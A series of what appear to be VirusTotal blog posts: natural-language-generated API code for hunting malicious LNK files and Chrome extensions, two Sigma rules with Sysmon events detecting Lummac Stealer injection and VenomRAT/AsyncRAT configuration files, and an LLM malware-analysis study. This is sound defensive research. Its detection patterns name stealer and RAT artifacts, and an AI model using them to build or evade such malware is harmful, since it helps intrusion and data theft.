Diagram showing the flow from User's Action to Actionable Intelligence via Gemini and VirusTotal API


Practical Example: Hunting for Malicious LNK Files

One of the exercises in our workshop focused on analyzing malicious LNK files submitted to VirusTotal within a specific time window, which keeps the number of results manageable. The goal was to discover common execution techniques and interesting command-line patterns.

Here’s how you could approach this with natural language queries in our meta Colab:

1. Retrieve all LNK file objects matching the criteria.

You can start by asking Gemini:

Create a code snippet to retrieve all LNK files submitted from January 1st, 2025, until April 1st, 2025, with 5 or more positives.

Code generated:

query_results = []

# Query for LNK files submitted between January 1st, 2025, and April 1st, 2025, with 5 or more positives.
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

async for itemobj in cli.iterator('/intelligence/search',params={'query': "%s"%(query)},limit=0):
    query_results.append(itemobj.to_dict())

lnk_files = list(query_results)
print(f"Found {len(lnk_files)} LNK files matching the criteria.")
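
The query string above combines two `fs:` bounds, a minimum number of positives, and a file type. As a minimal sketch, the same string can be composed from Python values so the window is easy to change; `submission_window_query` is a hypothetical helper name used only for illustration.

```python
from datetime import date


def submission_window_query(start, end, min_positives, file_type):
    """Compose an intelligence search query for a first-submission window.

    Hypothetical helper: it only formats the modifiers used in the text
    (fs:, p:, type:) and does not contact the API.
    """
    return (
        f"fs:{start.isoformat()}+ fs:{end.isoformat()}- "
        f"p:{min_positives}+ type:{file_type}"
    )


query = submission_window_query(date(2025, 1, 1), date(2025, 4, 1), 5, "lnk")
print(query)
```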

2. Flatten the data and visualize it.

Next, you can ask Gemini to process the retrieved data and create visualizations:

Flatten the data in a dataframe and create a bar chart depicting the most common TargetFileDOSName values.

Code generated:

import pandas as pd
import plotly.express as px

# Extract the 'attributes' dictionary from each object in our results
attributes_list = [result.get('attributes', {}) for result in lnk_files]

# Use json_normalize to create a flat DataFrame
df_flat = pd.json_normalize(attributes_list)

# Check if 'exiftool.TargetFileDOSName' column exists and is not empty
if 'exiftool.TargetFileDOSName' in df_flat.columns and not df_flat['exiftool.TargetFileDOSName'].empty:
    # Count the occurrences of each TargetFileDOSName
    target_file_counts = df_flat['exiftool.TargetFileDOSName'].value_counts().reset_index()
    target_file_counts.columns = ['TargetFileDOSName', 'Count']

    # Get the top 10 most common TargetFileDOSName values for visualization
    top_target_files = target_file_counts.head(10)

    # Create an interactive bar chart
    fig = px.bar(top_target_files,
                 x='Count',
                 y='TargetFileDOSName',
                 orientation='h',
                 title='Top 10 Most Common TargetFileDOSName in LNK files',
                 labels={'Count': 'Number of Occurrences', 'TargetFileDOSName': 'Target File DOS Name'})
    fig.show()
else:
    print("The 'exiftool.TargetFileDOSName' column was not found or is empty in the flattened data.")

print("DataFrame shape:", df_flat.shape)
df_flat.head()

This will generate a code snippet using pandas and Plotly to give you a clear view of the most frequent target files in the malicious LNKs.
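
The column names used above, such as `exiftool.TargetFileDOSName`, come from flattening nested attribute dictionaries into dotted keys. The following standard-library sketch illustrates that idea on a tiny record; it is not how pandas implements `json_normalize`, and the sample values are invented for the example.

```python
def flatten(obj, prefix=""):
    """Flatten nested dicts into a single dict with dotted keys."""
    flat = {}
    for key, value in obj.items():
        name = f"{prefix}.{key}" if prefix else key
        if isinstance(value, dict):
            # Recurse into nested dictionaries, extending the dotted prefix.
            flat.update(flatten(value, name))
        else:
            flat[name] = value
    return flat


# Illustrative attributes only; real VirusTotal objects carry many more fields.
sample_attributes = {
    "exiftool": {"TargetFileDOSName": "cmd.exe"},
    "lnk_info": {"machine_id": "desktop-example"},
}
flat = flatten(sample_attributes)
print(sorted(flat))
```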

3. Visualize relationships with a Sankey diagram.

To dig deeper and understand how the MachineID metadata recorded in each LNK file relates to the files it targets, you can ask for a more advanced visualization:

Create a Sankey diagram connecting MachineID (source) to TargetFileDOSName (target), with link widths representing the number of occurrences. Include only MachineID values with 10 or more occurrences, grouping the rest as "Other", and make the visualization interactive with hover details.

Code generated:

import plotly.graph_objects as go
import pandas as pd

# Ensure df_flat is available from previous steps
# If not, you might need to re-run the cell that creates df_flat.

# Check if necessary columns exist in df_flat
if 'lnk_info.machine_id' in df_flat.columns and 'exiftool.TargetFileDOSName' in df_flat.columns:

    # Calculate the frequency of each machine ID and target file name pair
    pair_frequencies = df_flat.groupby(['lnk_info.machine_id', 'exiftool.TargetFileDOSName']).size().reset_index(name='frequency')

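    # Sketch: the thresholding, grouping, and link construction follow the prompt above
    # Identify MachineIDs with fewer than 10 occurrences
    machine_id_counts = pair_frequencies.groupby('lnk_info.machine_id')['frequency'].sum().reset_index(name='count')
    other_machine_ids = machine_id_counts[machine_id_counts['count'] < 10]['lnk_info.machine_id']

    # Group infrequent MachineIDs as "Other" and re-aggregate the pair counts
    pair_frequencies['lnk_info.machine_id'] = pair_frequencies['lnk_info.machine_id'].where(~pair_frequencies['lnk_info.machine_id'].isin(other_machine_ids), 'Other')
    pair_frequencies = pair_frequencies.groupby(['lnk_info.machine_id', 'exiftool.TargetFileDOSName'])['frequency'].sum().reset_index()

    # Build node labels (sources first, then targets) and map each label to its node index
    sources = pair_frequencies['lnk_info.machine_id'].unique().tolist()
    targets = pair_frequencies['exiftool.TargetFileDOSName'].unique().tolist()
    source_idx = {name: i for i, name in enumerate(sources)}
    target_idx = {name: i + len(sources) for i, name in enumerate(targets)}

    # Create the interactive Sankey diagram; link labels are shown on hover
    fig = go.Figure(data=[go.Sankey(
        node=dict(label=sources + targets),
        link=dict(
            source=pair_frequencies['lnk_info.machine_id'].map(source_idx),
            target=pair_frequencies['exiftool.TargetFileDOSName'].map(target_idx),
            value=pair_frequencies['frequency'],
            label=pair_frequencies.apply(lambda row: f"{row['lnk_info.machine_id']} -> {row['exiftool.TargetFileDOSName']}: {row['frequency']}", axis=1)
        )
    )])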

    fig.update_layout(title_text="MachineID to TargetFileDOSName Sankey Diagram (Infrequent MachineIDs grouped as 'Other')", font_size=10)
    fig.show()
else:
    print("Required columns 'lnk_info.machine_id' or 'exiftool.TargetFileDOSName' not found in the DataFrame.")

This creates a visualization that shows which MachineID values are associated with which target files, allowing us to identify patterns for each MachineID.

Sankey diagram

4. Analyze the behavior of the LNK files.

Finally, you can investigate the behavior of the LNK files themselves, for example, by looking at how they are executed:

Create a pie chart depicting the distribution of window behaviors for LNK target processes (hidden, minimized,...).

Code generated:

import plotly.express as px
import pandas as pd

# Check if the relevant column exists
if 'lnk_info.header.show_window_str' in df_flat.columns and not df_flat['lnk_info.header.show_window_str'].empty:
    # Count the occurrences of each window behavior string
    window_behavior_counts = df_flat['lnk_info.header.show_window_str'].value_counts().reset_index()
    window_behavior_counts.columns = ['Window Behavior', 'Count']

    # Create an interactive pie chart
    fig = px.pie(window_behavior_counts,
                 names='Window Behavior',
                 values='Count',
                 title='Distribution of LNK Target Process Window Behaviors',
                 hover_data={'Count': True})
    fig.show()
else:
    print("The 'lnk_info.header.show_window_str' column was not found or is empty in the flattened data. Cannot create the pie chart.")

Pie chart of window behaviors

This allows you to quickly identify whether the LNK files are trying to hide their execution, a common malware technique.

5. Geographic Threat Mapping of Submissions

Understanding the geographical distribution of malware submissions can provide crucial insights into whether a campaign is widespread or targeting a specific region. By analyzing the submission metadata for our set of LNK files, an analyst can quickly identify potential hotspots, which could indicate a geographically focused attack. This is achieved by fetching the submissions relationship for each file, extracting the country of origin for each submission, and plotting this data on a world map (please note that the submission country is not necessarily the targeted country, although in some cases the two could be related).

Using the LNK files identified previously, create a code snippet that retrieves the submissions relationship for each file. Then, count the number of submissions from each country and display the results on a choropleth world map to visualize the submission hotspots.

In this case, Gemini uses step-by-step execution, which is a sequence of consecutive executions. The code generated was:

Step 1
query_results_with_submissions = []

# Define the search query string for LNK files
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

# Define the relationship to request
RELATIONS = "submissions"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_submissions.append(itemobj.to_dict())

# Convert query_results_with_submissions to a list called lnk_files_with_submissions
lnk_files_with_submissions = list(query_results_with_submissions)

# Print the number of LNK files found with submission data.
print(f"Found {len(lnk_files_with_submissions)} LNK files with submission data matching the criteria.")
Step 2
import pandas as pd

# Initialize an empty list to store submission countries
submission_countries = []

# Iterate through each item (LNK file) in the lnk_files_with_submissions list
for item in lnk_files_with_submissions:
    # Check if 'relationships' and 'submissions' exist and are not empty
    if 'relationships' in item and 'submissions' in item['relationships'] and item['relationships']['submissions']['data']:
        # Iterate through each submission object
        for submission in item['relationships']['submissions']['data']:
            # Extract the 'country' from 'submission['attributes']' and append it to the list
            if 'country' in submission['attributes']:
                submission_countries.append(submission['attributes']['country'])

# Convert the submission_countries list into a pandas Series
submission_countries_series = pd.Series(submission_countries)

# Count the occurrences of each country and store in a DataFrame
country_counts = submission_countries_series.value_counts().reset_index()
country_counts.columns = ['country', 'count']

print(f"Total unique countries found: {len(country_counts)}")
print("Top 5 submission countries:")
print(country_counts.head())
Step 3
!pip install pycountry
import plotly.express as px
import pandas as pd
import pycountry

# Function to get ISO-3 code from country name
def get_iso3(country_name):
    try:
        return pycountry.countries.search_fuzzy(country_name)[0].alpha_3
    except LookupError:  # search_fuzzy raises LookupError when nothing matches
        return None

# Apply the function to get ISO-3 codes
country_counts['iso_alpha'] = country_counts['country'].apply(get_iso3)

# Create a world heatmap using Plotly Express with ISO-3 codes
fig = px.choropleth(country_counts.dropna(subset=['iso_alpha']), # Drop rows where ISO code couldn't be found
                      locations="iso_alpha", # Use ISO-3 codes for locations
                      locationmode='ISO-3',   # Specify ISO-3 location mode
                      color="count",
                      hover_name="country",
                      color_continuous_scale="Viridis",
                      title="Submission Country Heatmap")

# Update layout to increase figure size
fig.update_layout(
    autosize=False,
    width=1000, # Adjust width as needed
    height=600 # Adjust height as needed
)

fig.show()

World heatmap of submissions

More Examples

Here are some other examples of how you can use natural language to query the VirusTotal API:

  • Find malicious Chrome extensions (based on this blog):

This question is a good example of how Google Colab runs the step-by-step process. Because we asked several questions in the same prompt, Gemini answers them in separate steps.

Retrieve all the samples from the /intelligence/search endpoint with the following query: fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight.

Get the bundled_files and create a new dataframe with them too, but store only those having 5 or more malicious value.

Then identify the top 5 magika of those bundled files obtained

Code generated:

Step 1
query_results_with_bundled_files = []

# Define the search query string
query = "fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight"

# Define the relationship to request
RELATIONS = "bundled_files"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_bundled_files.append(itemobj.to_dict())

# Convert query_results_with_bundled_files to a list called crx_files_with_bundled_files
crx_files_with_bundled_files = list(query_results_with_bundled_files)

# Print the number of found CRX files with bundled file data.
print(f"Found {len(crx_files_with_bundled_files)} CRX files with bundled file data matching the criteria.")
Step 2
import pandas as pd

# List to store all bundled file attributes
all_bundled_files_data = []

# Iterate through each CRX file with bundled file data
for crx_file in crx_files_with_bundled_files:
    if 'relationships' in crx_file and 'bundled_files' in crx_file['relationships']:
        for bundled_file in crx_file['relationships']['bundled_files']['data']:
            all_bundled_files_data.append(bundled_file.get('attributes', {}))

# Create a DataFrame from the extracted bundled file attributes
df_bundled_files = pd.json_normalize(all_bundled_files_data)

# Filter for bundled files with 5 or more malicious detections
df_malicious_bundled_files = df_bundled_files[df_bundled_files['last_analysis_stats.malicious'] >= 5]

print(f"Total bundled files extracted: {len(df_bundled_files)}")
print(f"Bundled files with 5 or more malicious detections: {len(df_malicious_bundled_files)}")

df_malicious_bundled_files.head()
Step 3
import pandas as pd
import plotly.express as px

# Check if the 'magika' column exists and is not empty in the filtered DataFrame
if 'magika' in df_malicious_bundled_files.columns and not df_malicious_bundled_files['magika'].empty:
    # Count the occurrences of each magika type
    magika_counts = df_malicious_bundled_files['magika'].value_counts().reset_index()
    magika_counts.columns = ['Magika Type', 'Count']

    # Get the top 5 most frequent magika types
    top_5_magika = magika_counts.head(5)

    print("Top 5 Magika Types in malicious bundled files:")
    print(top_5_magika)

    # Visualize the top 5 magika types
    fig = px.bar(top_5_magika,
                 x='Count',
                 y='Magika Type',
                 orientation='h',
                 title='Top 5 Magika Types in Malicious Bundled Files',
                 labels={'Count': 'Number of Occurrences', 'Magika Type': 'Magika Type'}) 
    fig.update_layout(yaxis={'categoryorder':'total ascending'}) # Order bars by count
    fig.show()
else:
    print("The 'magika' column was not found or is empty in the filtered malicious bundled files DataFrame. Cannot identify top magika types.")
  • Retrieve threat actors:
Retrieve threat actors targeting the United Kingdom with an espionage motivation. Sort the results in descending order of relevance. Display the total number of threat actors and their names.
  • Investigate campaigns:
Retrieve information about threat actors and malware involved in campaigns targeting Pakistan. For each threat actor, retrieve its country of origin, motivations, and targeted industries. For each malware, retrieve its name.

What’s next

This workshop, co-authored with Aleksandar from Sentinel LABS, will be presented at future conferences to show the community how to get the most out of the VirusTotal API. We’ll be updating the content of our meta Colab regularly and will share more information soon about how to access it.

In the meantime, if you have any feedback or ideas to contribute, we are open to suggestions.


Supercharging Your Threat Hunts: Join VirusTotal at Labscon for a Workshop on Automation and LLMs

We are excited to announce that our colleague Joseliyo Sánchez will be at Labscon to present our workshop: Advanced Threat Hunting: Automating Large-Scale Operations with LLMs. This workshop is a joint effort with SentinelOne and their researcher,…

Research that builds detections

Note: You can view the full content of the blog here.

Introduction

Detection engineering is becoming increasingly important in surfacing new malicious activity. Threat actors might take advantage of previously unknown malware families – but a successful detection of certain methodologies or artifacts can help expose the entire infection chain.
In previous blog posts, we announced the integration of Sigma rules for macOS and Linux into VirusTotal, as well as ways in which Sigma rules can be converted to YARA to take advantage of VirusTotal Livehunt capabilities. In this post, we will show different approaches to hunt for interesting samples and derive new Sigma detection opportunities based on their behavior.

Tell me what role you have and I’ll tell you how you use VirusTotal

VirusTotal is a really useful tool that can be used in many different ways. We have seen how people from SOCs and Incident Response teams use it (in fact, we have our VirusTotal Academy videos for SOC and IR teams), and we have also shown how those who hunt for threats or analyze those threats can use it too.
But there’s another really cool way to use VirusTotal – for people who build detections and those who are doing research. We want to show everyone how we use VirusTotal in our work. Hopefully, this will be helpful and also give people ideas for new ways to use it themselves.
To explain our process, we used examples of Lummac and VenomRAT samples that we found in recent campaigns. These caught our attention due to some behaviors that had not been identified by public detection rules in the community. For that reason we have created two Sigma rules to share with the community, but if you want to get all the details about how we identified it and started our research, go to our Google Threat Intelligence community blog.

Our approach

As detection engineers, it is important to look for techniques that can be in use by multiple threat actors – as this makes tracking malicious activity more efficient. Prior to creating those detections, it is best to check existing research and rule collections, such as the Sigma rules repository. This can save time and effort, as well as provide insight into previously observed samples that can be further researched.
A different approach would be to instead look for malicious files that are not detected by existing Sigma rules, since they can uncover novel methodologies and provide new opportunities for detection creation.
One approach is to hunt for files that are flagged by at least five different AV vendors, were uploaded within the last month, have sandbox execution (in order to view their behavior), and have not triggered any Crowdsourced Sigma rules.
p:5+ have:behavior fs:30d+ not have:sigma
This initial query can be adapted to incorporate additional filters that the researcher may find relevant. These could include modifiers to identify, for example, the presence of the PowerShell process in the list of executed processes (behavior_created_processes:powershell.exe), filtering results to only include documents (type:document), or identifying communication with services like Pastebin (behavior_network:pastebin.com).
Another option is to look at files that have been flagged by at least five AV engines and were analyzed in either Zenbox or CAPE. These sandboxes often produce detailed Sysmon logs, which are really useful for figuring out how to spot these threats. Again, we’d want to focus on files uploaded in the last month that haven’t triggered any Sigma rules. This gives us a good starting point for building new detection rules.
p:5+ (sandbox_name:"CAPE Sandbox" or sandbox_name:"Zenbox") fs:30d+ not have:sigma
Lastly, another idea is to look for files that have not triggered many high severity detections from the Sigma Crowdsourced rules, as these can be more evasive. Specifically, we will look for samples with zero critical, high or medium alerts – and no more than two low severity ones.
p:5+ have:behavior fs:30d+ sigma_critical:0 sigma_high:0 sigma_medium:0 sigma_low:2-
With these queries, we can start investigating samples that may be interesting candidates for new detection rules.
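
The last query can also be mirrored client-side when triaging objects that were already retrieved. The sketch below assumes each file's attributes expose a `sigma_analysis_stats` dictionary with `critical`, `high`, `medium`, and `low` counters; that layout is an assumption here, and `has_low_sigma_coverage` is a hypothetical helper name.

```python
def has_low_sigma_coverage(attributes, max_low=2):
    """Mirror sigma_critical:0 sigma_high:0 sigma_medium:0 sigma_low:2-.

    Assumes an attributes dict with a 'sigma_analysis_stats' mapping
    (assumed field layout); missing counters are treated as zero.
    """
    stats = attributes.get("sigma_analysis_stats", {})
    return (
        stats.get("critical", 0) == 0
        and stats.get("high", 0) == 0
        and stats.get("medium", 0) == 0
        and stats.get("low", 0) <= max_low
    )


# Illustrative records only.
quiet = {"sigma_analysis_stats": {"critical": 0, "high": 0, "medium": 0, "low": 1}}
noisy = {"sigma_analysis_stats": {"critical": 0, "high": 2, "medium": 1, "low": 0}}
print(has_low_sigma_coverage(quiet), has_low_sigma_coverage(noisy))
```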

Our detections for the community

Our approach helps us identify behaviors that seem interesting and worth focusing on. In our blog, where we explain this approach in detail, we highlighted two campaigns linked to Lummac and VenomRAT that exhibited interesting activity. Because of this, we decided to share the Sigma rules we developed for these campaigns. Both rules have been published in Sigma’s official repository for the community.

Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

title: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer
id: 19b3806e-46f2-4b4c-9337-e3d8653245ea
status: experimental
description: Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed in a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
references:
    - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef
    - https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html
    - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-11-14
tags:
    - attack.defense-evasion
    - attack.t1055
logsource:
    category: process_creation
    product: windows
detection:
    # VT Query: behaviour_processes:"C:\\Windows\\SysWOW64\\more.com" behaviour_processes:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"
    selection_parent:
        ParentImage|endswith: '\more.com'
    selection_child:
        - Image|endswith: '\vbc.exe'
        - OriginalFileName: 'vbc.exe'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

Sysmon event for: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 1,
    "Version": 5,
    "Level": 4,
    "Task": 1,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
      "SystemTime": "2024-11-26T16:23:05.132539500Z"
    },
    "EventRecordID": 692861,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2396,
      "ThreadID": 3116
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-11-26 16:23:05.064",
    "ProcessGuid": "{C784477D-F5E9-6745-6006-000000003F00}",
    "ProcessId": 4184,
    "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "FileVersion": "14.8.3761.0",
    "Description": "Visual Basic Command Line Compiler",
    "Product": "Microsoft® .NET Framework",
    "Company": "Microsoft Corporation",
    "OriginalFileName": "vbc.exe",
    "CommandLine": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "CurrentDirectory": "C:\\Users\\george\\AppData\\Roaming\\comlocal\\RUYCLAXYVMFJ\\",
    "User": "DESKTOP-B0T93D6\\george",
    "LogonGuid": "{C784477D-9D9B-66FF-6E87-050000000000}",
    "LogonId": "0x5876e",
    "TerminalSessionId": 1,
    "IntegrityLevel": "High",
    "Hashes": {
      "SHA1": "61F4D9A9EE38DBC72E840B3624520CF31A3A8653",
      "MD5": "FCCB961AE76D9E600A558D2D0225ED43",
      "SHA256": "466876F453563A272ADB5D568670ECA98D805E7ECAA5A2E18C92B6D3C947DF93",
      "IMPHASH": "1460E2E6D7F8ECA4240B7C78FA619D15"
    },
    "ParentProcessGuid": "{C784477D-F5D4-6745-5E06-000000003F00}",
    "ParentProcessId": 6572,
    "ParentImage": "C:\\Windows\\SysWOW64\\more.com",
    "ParentCommandLine": "C:\\Windows\\SysWOW64\\more.com",
    "ParentUser": "DESKTOP-B0T93D6\\george"
  }
} 
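
To make the link between the rule and the event explicit, here is a minimal sketch of the rule's logic applied to the relevant `EventData` fields. It is not a Sigma engine: it hard-codes this one rule, treats the two `selection_child` entries as alternatives, requires both selections (`all of selection_*`), and compares case-insensitively. `matches_more_vbc` is a hypothetical function name.

```python
def matches_more_vbc(event_data):
    """Evaluate the more.com -> vbc.exe rule against one process-creation event."""
    parent = event_data.get("ParentImage", "").lower()
    image = event_data.get("Image", "").lower()
    original = event_data.get("OriginalFileName", "").lower()

    selection_parent = parent.endswith("\\more.com")
    # The list under selection_child means either entry may match.
    selection_child = image.endswith("\\vbc.exe") or original == "vbc.exe"
    return selection_parent and selection_child


# Fields copied from the Sysmon event above.
event_data = {
    "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "OriginalFileName": "vbc.exe",
    "ParentImage": "C:\\Windows\\SysWOW64\\more.com",
}
print(matches_more_vbc(event_data))  # True
```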

File Creation Related To RAT Clients

title: File Creation Related To RAT Clients
id: 2f3039c8-e8fe-43a9-b5cf-dcd424a2522d
status: experimental
description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
references:
    - https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
    - https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-11-15
tags:
    - attack.execution
logsource:
    category: file_event
    product: windows
detection:
    # VT Query: behaviour_files:"\\AppData\\Roaming\\DataLogs\\DataLogs.conf"
    # VT Query: behaviour_files:"DataLogs.conf" or behaviour_files:"hvnc.conf" or behaviour_files:"dcrat.conf"
    selection_required:
        TargetFilename|contains: '\AppData\Roaming\'
    selection_variants:
        TargetFilename|endswith:
            - '\datalogs.conf'
            - '\hvnc.conf'
            - '\dcrat.conf'
        TargetFilename|contains:
            - '\mydata\'
            - '\datalogs\'
            - '\hvnc\'
            - '\dcrat\'
    condition: all of selection_*
falsepositives:
    - Legitimate software creating a file with the same name
level: high

Sysmon event for: File Creation Related To RAT Clients

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 11,
    "Version": 2,
    "Level": 4,
    "Task": 11,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
      "SystemTime": "2024-12-02T00:52:23.072811600Z"
    },
    "EventRecordID": 1555690,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2624,
      "ThreadID": 3112
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-12-02 00:52:23.059",
    "ProcessGuid": "{C784477D-04C6-674D-5C06-000000004B00}",
    "ProcessId": 7592,
    "Image": "C:\\Users\\george\\Desktop\\ezzz.exe",
    "TargetFilename": "C:\\Users\\george\\AppData\\Roaming\\MyData\\DataLogs.conf",
    "CreationUtcTime": "2024-12-02 00:52:23.059",
    "User": "DESKTOP-B0T93D6\\george"
  }
}
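
In this rule, `selection_variants` holds two keys on the same field, so the file name must both end with one of the listed `.conf` names and contain one of the listed directory names. A minimal sketch of that logic, hard-coded for this rule and compared case-insensitively (`matches_rat_conf` is a hypothetical function name):

```python
CONF_NAMES = ("\\datalogs.conf", "\\hvnc.conf", "\\dcrat.conf")
CONF_DIRS = ("\\mydata\\", "\\datalogs\\", "\\hvnc\\", "\\dcrat\\")


def matches_rat_conf(event_data):
    """Evaluate the RAT .conf file-creation rule against one file event."""
    target = event_data.get("TargetFilename", "").lower()

    selection_required = "\\appdata\\roaming\\" in target
    # Both keys under selection_variants must hold; each list is an OR.
    selection_variants = target.endswith(CONF_NAMES) and any(
        directory in target for directory in CONF_DIRS
    )
    return selection_required and selection_variants


# TargetFilename copied from the Sysmon event above.
event_data = {
    "TargetFilename": "C:\\Users\\george\\AppData\\Roaming\\MyData\\DataLogs.conf"
}
print(matches_rat_conf(event_data))  # True
```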

Wrapping up

Detection engineering teams can proactively create new detections by hunting for samples that are being distributed and uploaded to our platform. Applying our approach helps develop detections for recent behaviors that are not yet covered by existing detection mechanisms. This could help organizations be proactive in creating detections based on threat hunting missions.
The Sigma rules created to detect Lummac activity have been used during threat hunting missions to identify new samples of this family in VirusTotal. Another use is translating them into the language of the SIEM or EDR available in the infrastructure, as they could help identify potential behaviors related to Lummac samples observed in late 2024. After passing quality controls and being published on Sigma’s public GitHub, they have been integrated for use in VirusTotal, delivering the expected results. You can use them in the following way:
Lummac Stealer Activity – Execution Of More.com And Vbc.exe

sigma_rule:a1021d4086a92fd3782417a54fa5c5141d1e75c8afc9e73dc6e71ef9e1ae2e9c

File Creation Related To RAT Clients

sigma_rule:8f179585d5c1249ab1ef8cec45a16d112a53f91d143aa2b0b6713602b1d19252

We hope you found this blog interesting and useful, and as always we are happy to hear your feedback.


Leveraging LLMs for Malware Analysis: Insights and Future Directions

By Gerardo Fernández, Joseliyo Sánchez and Vicente Díaz
Malware analysis is (probably) the most expert-demanding and time-consuming activity for any security professional. Unfortunately, automation for static analysis has always been challenging for the security industry. The sheer volume and complexity of malicious code necessitate innovative approaches for efficient and effective analysis. At VirusTotal, we’ve been exploring the potential of Large Language Models (LLMs) to revolutionize malware analysis. We started down this path in April 2023 by automatically analyzing malicious scripts, and since then we have evolved our model to analyze Windows executable files. In this post, we want to share part of our current research and findings, as well as discuss future directions in this challenging approach.

Our approach

As a parallel development to the architecture described in our previous post, we wanted to better understand the strengths and limitations of LLMs when analyzing PE files. Our initial approach, using memory dumps from sandbox detonation and backscatter for additional deobfuscation capabilities (deobfuscation will likely be the biggest challenge for the analysis), sounds promising. However, rebuilding binaries from memory dumps has its own problems, and the whole process takes additional time and computational resources that may not be necessary for every sample. Hence the importance of understanding what LLMs can and can’t do when faced with a decompiled (or disassembled) binary.
We also want to consider additional tools we might use to provide the LLMs with additional context, including our sandbox analysis. For decompilation we will be using Hex-Rays IDA Pro most of the time, however our approach will be using a “decision tree” to optimize what tools, prompts and additional context to use in every case.
Our LLM of choice will be Gemini 1.5. Its extended token capacity is, in essence, what allows us to analyze decompiled and disassembled code and to provide additional context on top of any prompt we use.

Malware analysis

To get some understanding of the malware analysis capabilities of Gemini, we used a set of samples for different representative malware families. We used backscatter to determine the malware family every sample belonged to, and we chose only malicious samples for this part of the experiment. When the LLM was asked if the samples were malicious, these are the results per family:

Results per family
The global result is that the LLM agreed on maliciousness 84% of the time, couldn’t determine a verdict (unknown) 12% of the time, and returned a false negative 4% of the time.
It is interesting to note how much results vary among families, although this was expected, as different malware uses different obfuscation/packing/encryption methods. For instance, Nanocore uses AutoIT to build its binaries, something that the LLM is not ready to deal with natively. This is a good example of how we build our decision tree: if AutoIT is detected, we will definitely need to unpack first.
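
The AutoIT case can be read as one branch of such a decision tree. The following is a minimal sketch, assuming a hypothetical `traits` dictionary produced by earlier triage; the trait and step names are illustrative only and do not describe the actual pipeline.

```python
def plan_analysis(traits):
    """Return an ordered list of analysis steps for one sample.

    Hypothetical sketch: trait names and step names are illustrative.
    """
    steps = []
    if traits.get("autoit"):
        # AutoIT-built binaries are unpacked before the LLM sees any code.
        steps.append("unpack_autoit")
    steps.append("decompile")
    steps.append("llm_analysis")
    return steps


print(plan_analysis({"autoit": True}))
print(plan_analysis({"autoit": False}))
```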
One of the biggest advantages of LLMs is that they can provide a full explanation of the reasoning behind a verdict. For “unknown” maliciousness, it is interesting to note that the analysis included several red flags detected by the LLM, however they were not enough to go for a “malicious” verdict. We believe this can also be fine tuned with better prompting, adjusting temperature and further training.
We also found illustrative examples during our analysis. For instance, for some njRAT samples, the LLM returned some IOCs, as seen in the image below:

Information returned by the LLM
Interestingly, they are provided “right to left”. We also believe that we can improve mechanisms to double check IOCs, for instance through the use of API Function Calls to VirusTotal.
In the best-case scenario, such as when analyzing some Mirai samples, the LLM output provides all the details, including all the commands accepted by the malware:

Output related to Mirai

Consistent Output

Given that LLMs are non-deterministic, one of the difficulties in analyzing LLM output is obtaining consistent results. We found this especially relevant for some families, Qakbot being one example: when the LLM cannot analyze parts of the code due to obfuscation/encryption, it naturally focuses on the rest, meaning that the output describing the capabilities varies drastically between samples. Although this is understandable, and solvable by using the decision tree to provide the LLM with a more consistent input, we would also like to explore how to get a more consistent output.
We explored what we initially thought would be a good idea: asking Gemini to provide its output using the CAPA ontology. This would standardize the LLM’s answer around a series of well-defined capabilities and allow us to compare it with our sandbox output, which in turn would let us double-check the integrity of the LLM’s results.
